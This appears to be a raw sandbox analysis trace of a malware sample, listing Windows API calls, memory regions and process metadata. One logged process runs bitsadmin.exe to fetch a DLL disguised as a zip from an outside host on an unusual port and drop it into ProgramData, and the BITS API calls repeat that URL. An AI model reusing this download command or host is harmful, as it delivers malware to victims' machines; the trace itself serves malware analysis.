[0079.104] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x16, lpNumberOfCharsWritten=0x1adfd4, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1adfd4*=0x16) returned 1
[0079.105] CoTaskMemFree (pv=0x3183b8)
[0079.105] IBackgroundCopyJob:Complete (This=0x30a61c) returned 0x0
[0079.112] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1adfc0 | out: lpConsoleScreenBufferInfo=0x1adfc0) returned 1
[0079.112] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1adf94 | out: lpConsoleScreenBufferInfo=0x1adf94) returned 1
[0079.112] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1adfac, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1adfac*=0x2) returned 1
[0079.113] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1adf94 | out: lpConsoleScreenBufferInfo=0x1adf94) returned 1
[0079.113] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5643c4*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x1adfac, lpReserved=0x0 | out: lpBuffer=0x5643c4*, lpNumberOfCharsWritten=0x1adfac*=0x14) returned 1
[0079.113] GetCurrentThreadId () returned 0xe5c
[0079.113] PostThreadMessageW (idThread=0xe5c, Msg=0x401, wParam=0x0, lParam=0x0) returned 1
[0079.114] PeekMessageW (in: lpMsg=0x1af9c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x1af9c0) returned 1
[0079.114] IUnknown:Release (This=0x30a61c) returned 0x1
[0079.114] IUnknown:Release (This=0x30a544) returned 0x0
[0079.114] CoUninitialize ()
[0079.114] IUnknown:Release (This=0x320c70) returned 0x2
[0079.114] IUnknown:Release (This=0x320c70) returned 0x1
[0079.114] IUnknown:Release (This=0x320c70) returned 0x0
[0079.114] IUnknown:Release (This=0x30a61c) returned 0x1
[0079.114] CoTaskMemFree (pv=0x320c70)
[0079.118] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0079.118] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1b7) returned 1
[0079.118] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.119] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0079.119] CloseHandle (hObject=0x80) returned 1
[0079.119] exit (_Code=0)
Thread:
id = 201
os_tid = 0xe70
Thread:
id = 202
os_tid = 0xe74
Thread:
id = 203
os_tid = 0xe78
Thread:
id = 204
os_tid = 0xe7c
Process:
id = "21"
image_name = "bitsadmin.exe"
filename = "c:\\windows\\system32\\bitsadmin.exe"
page_root = "0x7f1be600"
os_pid = "0xe8c"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "6"
os_parent_pid = "0xa98"
cmd_line = "\"C:\\Windows\\System32\\bitsadmin.exe\" /transfer msd5 /priority foreground http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmhh.dll.zip?86737238 C:\\ProgramData\\xxx6000137xx\\marxvxinhhm64528113361.dll"
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2064
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2065
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2066
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 2067
start_va = 0x1b0000
end_va = 0x1f3fff
entry_point = 0x1b0000
region_type = mapped_file
name = "bitsadmin.exe"
filename = "\\Windows\\System32\\bitsadmin.exe" (normalized: "c:\\windows\\system32\\bitsadmin.exe")
Region:
id = 2068
start_va = 0x290000
end_va = 0x2cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000290000"
filename = ""
Region:
id = 2069
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2070
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2071
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 2072
start_va = 0x7ffd9000
end_va = 0x7ffd9fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd9000"
filename = ""
Region:
id = 2073
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 2074
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2075
start_va = 0x20000
end_va = 0x2ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 2076
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 2077
start_va = 0xc0000
end_va = 0x187fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000c0000"
filename = ""
Region:
id = 2078
start_va = 0x410000
end_va = 0x50ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000410000"
filename = ""
Region:
id = 2079
start_va = 0x690000
end_va = 0x69ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000690000"
filename = ""
Region:
id = 2080
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 2081
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2082
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2083
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 2084
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 2085
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 2086
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 2087
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 2088
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 2089
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 2090
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 2091
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 2092
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 2093
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 2094
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 2095
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 2096
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 2097
start_va = 0x190000
end_va = 0x196fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000190000"
filename = ""
Region:
id = 2098
start_va = 0x1a0000
end_va = 0x1a1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001a0000"
filename = ""
Region:
id = 2099
start_va = 0x200000
end_va = 0x200fff
entry_point = 0x200000
region_type = mapped_file
name = "bitsadmin.exe.mui"
filename = "\\Windows\\System32\\en-US\\bitsadmin.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\bitsadmin.exe.mui")
Region:
id = 2100
start_va = 0x210000
end_va = 0x210fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 2101
start_va = 0x220000
end_va = 0x220fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000220000"
filename = ""
Region:
id = 2102
start_va = 0x2d0000
end_va = 0x3d0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000002d0000"
filename = ""
Region:
id = 2103
start_va = 0x6a0000
end_va = 0x129ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006a0000"
filename = ""
Region:
id = 2104
start_va = 0x230000
end_va = 0x28bfff
entry_point = 0x230000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2105
start_va = 0x230000
end_va = 0x28bfff
entry_point = 0x230000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 2106
start_va = 0x74fc0000
end_va = 0x74fcbfff
entry_point = 0x74fc0000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 2107
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 2108
start_va = 0x510000
end_va = 0x67ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000510000"
filename = ""
Region:
id = 2109
start_va = 0x510000
end_va = 0x5eefff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000510000"
filename = ""
Region:
id = 2110
start_va = 0x640000
end_va = 0x67ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000640000"
filename = ""
Region:
id = 2111
start_va = 0x230000
end_va = 0x230fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000230000"
filename = ""
Region:
id = 2112
start_va = 0x770c0000
end_va = 0x77142fff
entry_point = 0x770c0000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 2113
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 2114
start_va = 0x240000
end_va = 0x240fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000240000"
filename = ""
Region:
id = 2115
start_va = 0x1330000
end_va = 0x136ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001330000"
filename = ""
Region:
id = 2116
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 2117
start_va = 0x12b0000
end_va = 0x12effff
entry_point = 0x0
region_type = private
name = "private_0x00000000012b0000"
filename = ""
Region:
id = 2118
start_va = 0x74b40000
end_va = 0x74b55fff
entry_point = 0x74b40000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 2119
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 2120
start_va = 0x250000
end_va = 0x28bfff
entry_point = 0x250000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2121
start_va = 0x250000
end_va = 0x28bfff
entry_point = 0x250000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2122
start_va = 0x250000
end_va = 0x28bfff
entry_point = 0x250000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2123
start_va = 0x250000
end_va = 0x28bfff
entry_point = 0x250000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2124
start_va = 0x250000
end_va = 0x28bfff
entry_point = 0x250000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2125
start_va = 0x748e0000
end_va = 0x7491afff
entry_point = 0x748e0000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 2126
start_va = 0x1370000
end_va = 0x163efff
entry_point = 0x1370000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 2127
start_va = 0x75060000
end_va = 0x7506dfff
entry_point = 0x75060000
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 2128
start_va = 0x1760000
end_va = 0x179ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001760000"
filename = ""
Region:
id = 2129
start_va = 0x1850000
end_va = 0x188ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001850000"
filename = ""
Region:
id = 2130
start_va = 0x7ffdb000
end_va = 0x7ffdbfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdb000"
filename = ""
Region:
id = 2131
start_va = 0x7ffdc000
end_va = 0x7ffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdc000"
filename = ""
Region:
id = 2132
start_va = 0x6f8b0000
end_va = 0x6f8b8fff
entry_point = 0x6f8b0000
region_type = mapped_file
name = "qmgrprxy.dll"
filename = "\\Windows\\System32\\qmgrprxy.dll" (normalized: "c:\\windows\\system32\\qmgrprxy.dll")
Thread:
id = 207
os_tid = 0xe90
[0079.223] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfc4c | out: lpSystemTimeAsFileTime=0x2cfc4c*(dwLowDateTime=0xdfccc3b0, dwHighDateTime=0x1d469c7))
[0079.223] GetCurrentProcessId () returned 0xe8c
[0079.223] GetCurrentThreadId () returned 0xe90
[0079.223] GetTickCount () returned 0x21ab0
[0079.223] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfc44 | out: lpPerformanceCount=0x2cfc44*=1815317100000) returned 1
[0079.226] GetModuleHandleA (lpModuleName=0x0) returned 0x1b0000
[0079.226] __set_app_type (_Type=0x1)
[0079.227] __p__fmode () returned 0x757a31f4
[0079.227] __p__commode () returned 0x757a31fc
[0079.227] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1d7f33) returned 0x0
[0079.227] __wgetmainargs (in: _Argc=0x1f0824, _Argv=0x1f082c, _Env=0x1f0828, _DoWildCard=0, _StartInfo=0x1f0838 | out: _Argc=0x1f0824, _Argv=0x1f082c, _Env=0x1f0828) returned 0
[0079.227] _onexit (_Func=0x1d925e) returned 0x1d925e
[0079.227] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0079.227] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
[0079.228] AitLogFeatureUsageByApp () returned 0x0
[0079.228] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0079.228] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
[0079.228] VerifyVersionInfoW (in: lpVersionInformation=0x2cfac0, dwTypeMask=0x3, dwlConditionMask=0x1b | out: lpVersionInformation=0x2cfac0) returned 1
[0079.228] SetLastError (dwErrCode=0x0)
[0079.228] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0079.228] GetProcAddress (hModule=0x75370000, lpProcName="HeapSetInformation") returned 0x753c4157
[0079.228] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0079.229] GetCurrentProcess () returned 0xffffffff
[0079.229] GetCurrentThread () returned 0xfffffffe
[0079.229] GetCurrentProcess () returned 0xffffffff
[0079.229] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1dc3b0, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x1dc3b0*=0x80) returned 1
[0079.229] SetConsoleCtrlHandler (HandlerRoutine=0x1c74cb, Add=1) returned 1
[0079.229] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0079.229] GetProcAddress (hModule=0x75370000, lpProcName="SetThreadUILanguage") returned 0x753c24c2
[0079.229] SetThreadUILanguage (LangId=0x0) returned 0x409
[0079.229] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437"
[0079.230] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437"
[0079.230] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437"
[0079.231] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437"
[0079.231] _wcsicmp (_String1="/transfer", _String2="/RAWRETURN") returned 2
[0079.231] _wcsicmp (_String1="/transfer", _String2="/WRAP") returned -3
[0079.231] _wcsicmp (_String1="/transfer", _String2="/NOWRAP") returned 6
[0079.231] swprintf_s (in: _Dst=0x2cfbb8, _SizeInWords=0x12, _Format="%u.%u.%u" | out: _Dst="7.5.7601") returned 8
[0079.231] GetFileType (hFile=0x7) returned 0x2
[0079.231] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cfb2c | out: lpMode=0x2cfb2c) returned 1
[0079.231] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2cfb5c, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cfb5c*=0x2) returned 1
[0079.232] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x24, lpNumberOfCharsWritten=0x2cfb68, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cfb68*=0x24) returned 1
[0079.232] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x2cfb6c, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cfb6c*=0x1e) returned 1
[0079.232] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x29, lpNumberOfCharsWritten=0x2cfb70, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cfb70*=0x29) returned 1
[0079.232] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2cfb74, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cfb74*=0x2) returned 1
[0079.232] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x5e, lpNumberOfCharsWritten=0x2cfb78, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cfb78*=0x5e) returned 1
[0079.233] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x58, lpNumberOfCharsWritten=0x2cfb7c, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cfb7c*=0x58) returned 1
[0079.233] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2cfb80, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cfb80*=0x2) returned 1
[0079.233] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0079.244] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0079.244] GetNumberOfConsoleInputEvents (in: hConsoleInput=0x3, lpNumberOfEvents=0x2cfbcc | out: lpNumberOfEvents=0x2cfbcc) returned 1
[0079.244] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0079.244] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x1dc3a8 | out: lpMode=0x1dc3a8) returned 1
[0079.244] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x1dc390 | out: lpConsoleScreenBufferInfo=0x1dc390) returned 1
[0079.244] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1dc38c | out: lpMode=0x1dc38c) returned 1
[0079.244] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0079.245] _wcsicmp (_String1="/transfer", _String2="/HELP") returned 12
[0079.245] _wcsicmp (_String1="/transfer", _String2="/?") returned 53
[0079.245] _wcsicmp (_String1="/transfer", _String2="/UTIL") returned -1
[0079.245] _wcsicmp (_String1="/transfer", _String2="/LIST") returned 8
[0079.245] _wcsicmp (_String1="/transfer", _String2="/MONITOR") returned 7
[0079.245] _wcsicmp (_String1="/transfer", _String2="/RESET") returned 2
[0079.245] _wcsicmp (_String1="/transfer", _String2="/TRANSFER") returned 0
[0079.245] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x1) returned 1
[0079.245] _wcsicmp (_String1="/priority", _String2="/UPLOAD") returned -5
[0079.245] _wcsicmp (_String1="/priority", _String2="/DOWNLOAD") returned 12
[0079.245] _wcsicmp (_String1="/priority", _String2="/PRIORITY") returned 0
[0079.245] _wcsicmp (_String1="foreground", _String2="FOREGROUND") returned 0
[0079.245] CoCreateInstance (in: rclsid=0x1c65d4*(Data1=0x4991d34b, Data2=0x80a1, Data3=0x4291, Data4=([0]=0x83, [1]=0xb6, [2]=0x33, [3]=0x28, [4]=0x36, [5]=0x6b, [6]=0x90, [7]=0x97)), pUnkOuter=0x0, dwClsContext=0x4, riid=0x1c65b4*(Data1=0x5ce34c0d, Data2=0xdc9, Data3=0x4c1f, Data4=([0]=0x89, [1]=0x7c, [2]=0xda, [3]=0xa1, [4]=0xb7, [5]=0x8c, [6]=0xee, [7]=0x7c)), ppv=0x1dc3b4 | out: ppv=0x1dc3b4*=0x42a57c) returned 0x0
[0079.288] IBackgroundCopyManager:CreateJob (in: This=0x42a57c, DisplayName="msd5", Type=0x0, pJobId=0x2cfb94, ppJob=0x2cfb90 | out: pJobId=0x2cfb94*(Data1=0x17c21301, Data2=0x7312, Data3=0x4ae9, Data4=([0]=0x8e, [1]=0xcf, [2]=0x9b, [3]=0x4, [4]=0xa, [5]=0x20, [6]=0x45, [7]=0x22)), ppJob=0x2cfb90*=0x42a654) returned 0x0
[0079.296] CoTaskMemAlloc (cb=0x50) returned 0x440cc8
[0079.296] IUnknown:AddRef (This=0x42a654) returned 0x2
[0079.296] IUnknown:AddRef (This=0x42a654) returned 0x3
[0079.296] PeekMessageW (in: lpMsg=0x2cfb0c, hWnd=0x0, wMsgFilterMin=0x400, wMsgFilterMax=0x400, wRemoveMsg=0x0 | out: lpMsg=0x2cfb0c) returned 0
[0079.296] IUnknown:Release (This=0x42a654) returned 0x2
[0079.296] IBackgroundCopyJob:SetPriority (This=0x42a654, Val=0x0) returned 0x0
[0079.300] IBackgroundCopyJob:AddFile (This=0x42a654, RemoteUrl="http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmhh.dll.zip?86737238", LocalName="C:\\ProgramData\\xxx6000137xx\\marxvxinhhm64528113361.dll") returned 0x0
[0079.310] IBackgroundCopyJob:SetNotifyFlags (This=0x42a654, Val=0xb) returned 0x0
[0079.313] IBackgroundCopyJob:SetNotifyInterface (This=0x42a654, Val=0x440cc8) returned 0x0
[0079.313] IUnknown:QueryInterface (in: This=0x440cc8, riid=0x76a63e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2cf610 | out: ppvObject=0x2cf610*=0x0) returned 0x80004002
[0079.313] IUnknown:QueryInterface (in: This=0x440cc8, riid=0x76a63e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2cf5d0 | out: ppvObject=0x2cf5d0*=0x0) returned 0x80004002
[0079.313] IUnknown:QueryInterface (in: This=0x440cc8, riid=0x76a597c4*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2cf5b8 | out: ppvObject=0x2cf5b8*=0x0) returned 0x80004002
[0079.313] IUnknown:QueryInterface (in: This=0x440cc8, riid=0x76a69b0c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2cf56c | out: ppvObject=0x2cf56c*=0x440cc8) returned 0x0
[0079.313] IUnknown:AddRef (This=0x440cc8) returned 0x3
[0079.313] IUnknown:QueryInterface (in: This=0x440cc8, riid=0x76a4c15c*(Data1=0x18, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x2cf4cc | out: ppvObject=0x2cf4cc*=0x0) returned 0x80004002
